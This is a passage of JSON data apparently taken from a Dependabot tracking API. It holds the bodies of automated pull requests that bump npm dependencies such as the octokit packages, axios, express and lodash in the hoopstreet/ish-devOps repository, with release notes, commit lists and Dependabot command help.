href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/80745be518d862ab9a304ffb7793be4ebc3de0ce\"\u003e\u003ccode\u003e80745be\u003c/code\u003e\u003c/a\u003e ci(action): update actions/checkout action to v5 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/687\"\u003e#687\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/0e236cb76f82cfc073b381802e4fea03f59c213c\"\u003e\u003ccode\u003e0e236cb\u003c/code\u003e\u003c/a\u003e feat: new Projects v2 endpoints, new code scanning dismissal endpoints, many ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/bf19e3ed5f5e833712d2663984c4ce456696e93e\"\u003e\u003ccode\u003ebf19e3e\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency prettier to v3.6.2 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/685\"\u003e#685\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/4f9fc562b1dda9d8f724e8ffee444141c2f45673\"\u003e\u003ccode\u003e4f9fc56\u003c/code\u003e\u003c/a\u003e ci(action): update actions/setup-node action to v5 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/688\"\u003e#688\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/8e5da25f975d2f31dda6b8b588d71f2c768a8df2\"\u003e\u003ccode\u003e8e5da25\u003c/code\u003e\u003c/a\u003e fix: handle url in response when using pagination with compareCommits (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/686\"\u003e#686\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/6d8ea8ad68058e45883a1a7edaaf6d8a91d732bd\"\u003e\u003ccode\u003e6d8ea8a\u003c/code\u003e\u003c/a\u003e feat: add paginatantion support for  \u003ccode\u003ecompareCommits\u003c/code\u003e and `compareCommitsWith...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/8ec2713699ee473ee630be5c8a66b9665bcd4173\"\u003e\u003ccode\u003e8ec2713\u003c/code\u003e\u003c/a\u003e fix(deps): update \u003ccode\u003e@octokit/types\u003c/code\u003e - no new paginated endpoints (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/680\"\u003e#680\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v6.1.2...v14.0.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/request` from 6.2.8 to 10.0.8\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/request.js/releases\"\u003e@​octokit/request's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev10.0.8\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.7...v10.0.8\"\u003e10.0.8\u003c/a\u003e (2026-02-20)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003euse \u003ccode\u003ejson-with-bigint\u003c/code\u003e instead of built-in JSON methods in order to properly support int64's (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/798\"\u003e#798\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/f13f5d9814cec9e51cdbe57e3864f9a7f95a9731\"\u003ef13f5d9\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.7\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.6...v10.0.7\"\u003e10.0.7\u003c/a\u003e (2025-11-13)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ereadme:\u003c/strong\u003e properly structure the options for custom agent (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/786\"\u003e#786\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/f17c1c13c7cba81187c419da06b815ed741c950c\"\u003ef17c1c1\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/octokit/request.js/issues/785\"\u003e#785\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.6\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.5...v10.0.6\"\u003e10.0.6\u003c/a\u003e (2025-10-30)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v16 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/783\"\u003e#783\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/1aeac5672c04bc508e46796660465b1b67cf397c\"\u003e1aeac56\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.5\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.4...v10.0.5\"\u003e10.0.5\u003c/a\u003e (2025-09-29)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update octokit deps (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/772\"\u003e#772\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/30f83b64578eebf6988b44df495d235de8136e6e\"\u003e30f83b6\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.4\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.3...v10.0.4\"\u003e10.0.4\u003c/a\u003e (2025-09-29)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v15 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/775\"\u003e#775\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/ad78b4c8099a790d9ac3489342021896cabdbecd\"\u003ead78b4c\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.3\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.2...v10.0.3\"\u003e10.0.3\u003c/a\u003e (2025-06-20)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003epkg:\u003c/strong\u003e unreplaced version number in \u003ccode\u003edist-bundle/\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/765\"\u003e#765\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/5b181af867a6b3ccfd23800d876ff22e1e54fd7d\"\u003e5b181af\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.1...v10.0.2\"\u003e10.0.2\u003c/a\u003e (2025-05-20)\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/f13f5d9814cec9e51cdbe57e3864f9a7f95a9731\"\u003e\u003ccode\u003ef13f5d9\u003c/code\u003e\u003c/a\u003e fix: use \u003ccode\u003ejson-with-bigint\u003c/code\u003e instead of built-in JSON methods in order to prop...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/9ba6ae0fd2eff35a6c29a9f032eca6e9ba002976\"\u003e\u003ccode\u003e9ba6ae0\u003c/code\u003e\u003c/a\u003e Document that unsuccessful HTTP status code result in an exception (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/795\"\u003e#795\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/7160b8201ee183d57e3572c9ac78aa3f241c9468\"\u003e\u003ccode\u003e7160b82\u003c/code\u003e\u003c/a\u003e chore(deps): replace glob with tinyglobby (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/791\"\u003e#791\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/ab8018b6d42de25adb305e3ea5ea840ee2805481\"\u003e\u003ccode\u003eab8018b\u003c/code\u003e\u003c/a\u003e ci(action): update peter-evans/create-or-update-comment action to v5 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/776\"\u003e#776\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/fb916e454df205980835281368da81a003cde30d\"\u003e\u003ccode\u003efb916e4\u003c/code\u003e\u003c/a\u003e build(deps): bump vite from 6.3.4 to 6.4.1 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/780\"\u003e#780\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/e1eb7693969a87cbdde278c82a7474b8acec9207\"\u003e\u003ccode\u003ee1eb769\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency esbuild to ^0.27.0 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/784\"\u003e#784\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/f17c1c13c7cba81187c419da06b815ed741c950c\"\u003e\u003ccode\u003ef17c1c1\u003c/code\u003e\u003c/a\u003e fix(readme): properly structure the options for custom agent (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/786\"\u003e#786\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/ea46fa9cd46f970fad5e286e6fdd2ea46929ac5d\"\u003e\u003ccode\u003eea46fa9\u003c/code\u003e\u003c/a\u003e ci(action): update github/codeql-action action to v4 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/778\"\u003e#778\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/8166d281814326b3e11d60b1895e623f2fd51c9e\"\u003e\u003ccode\u003e8166d28\u003c/code\u003e\u003c/a\u003e chore(deps): update vitest monorepo to v4 (major) (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/781\"\u003e#781\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/1aeac5672c04bc508e46796660465b1b67cf397c\"\u003e\u003ccode\u003e1aeac56\u003c/code\u003e\u003c/a\u003e fix(deps): update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v16 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/783\"\u003e#783\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/octokit/request.js/compare/v6.2.8...v10.0.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for \u003ccode\u003e@​octokit/request\u003c/code\u003e since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/request-error` from 3.0.3 to 7.1.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/request-error.js/releases\"\u003e@​octokit/request-error's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.1.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v7.0.2...v7.1.0\"\u003e7.1.0\u003c/a\u003e (2025-11-13)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003einherit options from base \u003ccode\u003eError\u003c/code\u003e class to add support for the \u003ccode\u003ecause\u003c/code\u003e property (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/535\"\u003e#535\u003c/a\u003e/\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/536\"\u003e#536\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/2ea27805b93ed21d8cc423a6ad436513ecca0b55\"\u003e2ea2780\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.0.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v7.0.1...v7.0.2\"\u003e7.0.2\u003c/a\u003e (2025-10-30)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v16 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/533\"\u003e#533\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/e5a75ef9cdede512185df71ffe5117c2b71027a9\"\u003ee5a75ef\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.0.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v7.0.0...v7.0.1\"\u003e7.0.1\u003c/a\u003e (2025-09-29)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v15 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/522\"\u003e#522\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/4a453f21afbde9fc19d779518cb8e5f23d05038f\"\u003e4a453f2\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.0.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v6.1.8...v7.0.0\"\u003e7.0.0\u003c/a\u003e (2025-05-20)\u003c/h1\u003e\n\u003ch3\u003eContinuous Integration\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003estop testing against NodeJS v18 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/512\"\u003e#512\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/8eee0c1eff4f247b714da5db9437787507e124df\"\u003e8eee0c1\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBREAKING CHANGES\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eDrop support for NodeJS v18\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003ebuild: set minimal node version in build script to v20\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eci: stop testing against NodeJS v18\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev6.1.8\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v6.1.7...v6.1.8\"\u003e6.1.8\u003c/a\u003e (2025-04-10)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v14 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/505\"\u003e#505\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/ab4ea7b81bd8055060bfafa47b7eb13d89c7e475\"\u003eab4ea7b\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev6.1.7\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/2ea27805b93ed21d8cc423a6ad436513ecca0b55\"\u003e\u003ccode\u003e2ea2780\u003c/code\u003e\u003c/a\u003e feat: inherit options from base \u003ccode\u003eError\u003c/code\u003e class to add support for the \u003ccode\u003ecause\u003c/code\u003e ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/ac7b3094475260d5bc95951d2040e38da8e88dd8\"\u003e\u003ccode\u003eac7b309\u003c/code\u003e\u003c/a\u003e chore(deps): update vitest monorepo to v4 (major) (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/531\"\u003e#531\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/dadc76ddc454c475f07525a8cd96fc29e4353cb1\"\u003e\u003ccode\u003edadc76d\u003c/code\u003e\u003c/a\u003e ci(action): update peter-evans/create-or-update-comment action to v5 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/525\"\u003e#525\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/f57f2e6b6fdc3578c3484c8939bcf56548b620eb\"\u003e\u003ccode\u003ef57f2e6\u003c/code\u003e\u003c/a\u003e build(deps): lock file maintenance (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/534\"\u003e#534\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/e5a75ef9cdede512185df71ffe5117c2b71027a9\"\u003e\u003ccode\u003ee5a75ef\u003c/code\u003e\u003c/a\u003e fix(deps): update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v16 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/533\"\u003e#533\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/e5d5de21540843d46e1dbd15696af8bdff9cf400\"\u003e\u003ccode\u003ee5d5de2\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency \u003ccode\u003e@​types/node\u003c/code\u003e to v24 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/532\"\u003e#532\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/8cc127bf725e581cdd32336669d322632e4392b4\"\u003e\u003ccode\u003e8cc127b\u003c/code\u003e\u003c/a\u003e ci(action): update actions/setup-node action to v6 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/529\"\u003e#529\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/b3a876bc68c0d044bf52eeaa513760e362d426e8\"\u003e\u003ccode\u003eb3a876b\u003c/code\u003e\u003c/a\u003e build(deps): lock file maintenance (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/527\"\u003e#527\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/cf1817b2c1bd15ffbf26bbf4390aa07084a10fce\"\u003e\u003ccode\u003ecf1817b\u003c/code\u003e\u003c/a\u003e ci(action): update github/codeql-action action to v4 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/528\"\u003e#528\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/61f1e8750fa8c1b7b57f4323ab13b92bb1017cf2\"\u003e\u003ccode\u003e61f1e87\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency tinybench to v5 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/519\"\u003e#519\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/octokit/request-error.js/compare/v3.0.3...v7.1.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore \u003cdependency name\u003e major version` will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e minor version` will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e` will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)\n- `@dependabot unignore \u003cdependency name\u003e` will remove all of the ignore conditions of the specified dependency\n- `@dependabot unignore \u003cdependency name\u003e \u003cignore condition\u003e` will remove the ignore condition of the specified dependency and ignore conditions\nYou can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/hoopstreet/ish-devOps/network/alerts).\n\n\u003c/details\u003e","html_url":"https://github.com/hoopstreet/ish-devOps/pull/1","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/hoopstreet%2Fish-devOps/issues/1","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/1/packages"},{"uuid":"4367422683","node_id":"PR_kwDONns3ec7XkcoA","number":43,"state":"open","title":"Bump the npm_and_yarn group across 1 directory with 30 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-05-02T01:21:03.000Z","updated_at":"2026-05-02T01:21:14.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"npm_and_yarn","update_count":30,"packages":[{"name":"axios","old_version":"0.23.0","new_version":"0.31.0","repository_url":"https://github.com/axios/axios"},{"name":"js-yaml","old_version":"3.14.1","new_version":"3.14.2","repository_url":"https://github.com/nodeca/js-yaml"},{"name":"js-yaml","old_version":"4.1.0","new_version":"4.1.1","repository_url":"https://github.com/nodeca/js-yaml"},{"name":"node-forge","old_version":"1.3.0","new_version":"1.4.0","repository_url":"https://github.com/digitalbazaar/forge"},{"name":"@babel/traverse","old_version":"7.14.2","new_version":"7.29.0","repository_url":"https://github.com/babel/babel"},{"name":"@octokit/plugin-paginate-rest","old_version":"2.21.3","new_version":"14.0.0","repository_url":"https://github.com/octokit/plugin-paginate-rest.js"},{"name":"@tootallnate/once","old_version":"1.1.2","new_version":"removed","repository_url":"https://github.com/TooTallNate/once"},{"name":"body-parser","old_version":"1.19.0","new_version":"1.20.5","repository_url":"https://github.com/expressjs/body-parser"},{"name":"express","old_version":"4.17.1","new_version":"4.22.1","repository_url":"https://github.com/expressjs/express"},{"name":"brace-expansion","old_version":"1.1.11","new_version":"1.1.14","repository_url":"https://github.com/juliangruber/brace-expansion"},{"name":"braces","old_version":"3.0.2","new_version":"3.0.3","repository_url":"https://github.com/micromatch/braces"},{"name":"diff","old_version":"4.0.2","new_version":"4.0.4","repository_url":"https://github.com/kpdecker/jsdiff"},{"name":"flatted","old_version":"3.1.1","new_version":"3.4.2","repository_url":"https://github.com/WebReflection/flatted"},{"name":"got","old_version":"9.6.0","new_version":"removed","repository_url":"https://github.com/sindresorhus/got"},{"name":"json5","old_version":"1.0.1","new_version":"1.0.2","repository_url":"https://github.com/json5/json5"},{"name":"lodash","old_version":"4.17.21","new_version":"4.18.1","repository_url":"https://github.com/lodash/lodash"},{"name":"minimatch","old_version":"3.0.4","new_version":"3.1.5","repository_url":"https://github.com/isaacs/minimatch"},{"name":"on-headers","old_version":"1.0.2","new_version":"1.1.0","repository_url":"https://github.com/jshttp/on-headers"},{"name":"picomatch","old_version":"2.3.0","new_version":"2.3.2","repository_url":"https://github.com/micromatch/picomatch"},{"name":"tar-fs","old_version":"2.0.1","new_version":"2.1.4","repository_url":"https://github.com/mafintosh/tar-fs"},{"name":"uuid","old_version":"8.3.2","new_version":"removed","repository_url":"https://github.com/uuidjs/uuid"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 20 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [axios](https://github.com/axios/axios) | `0.23.0` | `0.31.0` |\n| [js-yaml](https://github.com/nodeca/js-yaml) | `3.14.1` | `3.14.2` |\n| [js-yaml](https://github.com/nodeca/js-yaml) | `4.1.0` | `4.1.1` |\n| [node-forge](https://github.com/digitalbazaar/forge) | `1.3.0` | `1.4.0` |\n| [@babel/traverse](https://github.com/babel/babel/tree/HEAD/packages/babel-traverse) | `7.14.2` | `7.29.0` |\n| [@octokit/plugin-paginate-rest](https://github.com/octokit/plugin-paginate-rest.js) | `2.21.3` | `14.0.0` |\n| [@tootallnate/once](https://github.com/TooTallNate/once) | `1.1.2` | `removed` |\n| [body-parser](https://github.com/expressjs/body-parser) | `1.19.0` | `1.20.5` |\n| [express](https://github.com/expressjs/express) | `4.17.1` | `4.22.1` |\n| [brace-expansion](https://github.com/juliangruber/brace-expansion) | `1.1.11` | `1.1.14` |\n| [braces](https://github.com/micromatch/braces) | `3.0.2` | `3.0.3` |\n| [diff](https://github.com/kpdecker/jsdiff) | `4.0.2` | `4.0.4` |\n| [flatted](https://github.com/WebReflection/flatted) | `3.1.1` | `3.4.2` |\n| [got](https://github.com/sindresorhus/got) | `9.6.0` | `removed` |\n| [json5](https://github.com/json5/json5) | `1.0.1` | `1.0.2` |\n| [lodash](https://github.com/lodash/lodash) | `4.17.21` | `4.18.1` |\n| [minimatch](https://github.com/isaacs/minimatch) | `3.0.4` | `3.1.5` |\n| [on-headers](https://github.com/jshttp/on-headers) | `1.0.2` | `1.1.0` |\n| [picomatch](https://github.com/micromatch/picomatch) | `2.3.0` | `2.3.2` |\n| [tar-fs](https://github.com/mafintosh/tar-fs) | `2.0.1` | `2.1.4` |\n| [uuid](https://github.com/uuidjs/uuid) | `8.3.2` | `removed` |\n\n\nUpdates `axios` from 0.23.0 to 0.31.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/axios/axios/releases\"\u003eaxios's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.31.0\u003c/h2\u003e\n\u003cp\u003eThis release backports security fixes from v1.x, hardens the CI/CD supply chain with OIDC publishing and \u003ccode\u003ezizmor\u003c/code\u003e scanning, resolves TypeScript typing issues in \u003ccode\u003eAxiosInstance\u003c/code\u003e, and fixes a performance regression in \u003ccode\u003eisEmptyObject()\u003c/code\u003e.\u003c/p\u003e\n\u003ch2\u003e🔒 Security Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003eHeader Injection \u0026amp; Proxy Bypass:\u003c/strong\u003e Backports v1 security hardening — sanitizes outgoing header values to strip invalid bytes, CRLF sequences, and boundary whitespace (including array values); adds proper \u003ccode\u003eNO_PROXY\u003c/code\u003e/\u003ccode\u003eno_proxy\u003c/code\u003e enforcement covering wildcards, explicit ports, loopback aliases (\u003ccode\u003elocalhost\u003c/code\u003e, \u003ccode\u003e127.0.0.1\u003c/code\u003e, \u003ccode\u003e::1\u003c/code\u003e), bracketed IPv6, and trailing-dot hostnames. Proxy bypass is now checked before the proxy URL is parsed, and \u003ccode\u003eparsed.host\u003c/code\u003e is used for correct port and IPv6 handling. (\u003cstrong\u003e\u003ca 